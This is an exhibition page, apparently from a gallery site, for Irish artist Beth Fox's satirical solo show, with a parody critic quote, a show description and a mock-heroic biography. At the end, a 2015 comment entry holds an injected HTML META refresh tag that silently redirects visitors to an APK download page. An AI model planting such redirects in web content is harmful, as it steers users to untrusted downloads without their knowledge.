I'M CURATING MY OWN SOLO SHOW!!!!!!!!!!!!!!!!111111

27.09.2013 15:43 - 19.10.2013

Beth Fox | výstava | en

“Beth Fox's work espouses a complex form of reflexive post-modern humour with influences as diverse as Kierkagaard and Woody Allen, through the medium of sculpture and text new variations are synthesised from both opaque and transparent meanings and what starts out as contemplation soon becomes manipulated into a hegemony of defeat, leaving only a sense of unreality and the unlikelihood of a new order. . ” - August DeWitt (writer, intellectual, art critic, feminist, political activist and gender theorist.)

"I'M CURATING MY OWN SOLO SHOW!!!!!!!!!!!!!!!!!!!!111" is the first UK solo exhibition of Irish artist Beth Fox.

Fox's practice involves an investigation into the legacies of conceptual and appropriation art. Incorporating sculpture, drawing and text Fox's work questions the structures and dynamics of the art world through the eyes of the “struggling artist” archetype. Her work employs self-conscious humour to question the dynamics of the institute; the relationships and/or power struggles between art and artist/artist and curator/curator and gallerist/gallerist and collector/audience and artist/gallerist and art/collector and gallerina. Much of her work is concerned with hierarchies in art institutions and the space that exists between “emerging”, “established” and “successful” art/ists.

About the artist:

Beth Fox gained employment at an early age working for a local Shepherd in the lonely hills on the west coast of Ireland. One day she was discovered by a passing nobleman who witnessed her quietly sketching sheep in the sand with a pointed stick. The nobleman was so taken with her talent and skill that he took her away with him and trained her as a painter in his studio in Florence. One day while she was painting the cherub-like face of an angel in the background of one of the nobleman’s majestic canvases he stopped her. The brush fell from his hand in astonishment as he realised that he had nothing left to teach her.
She became the master, and he the pupil.



27.09.2013 15:43 - 19.10.2013


<META http-equiv="refresh" content="0;URL=http://cie.calpoly.edu/members/tubemateapk/bio/default.aspx"> | 20.12.2015 12:58
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dfsdfs | 20.12.2015 12:58
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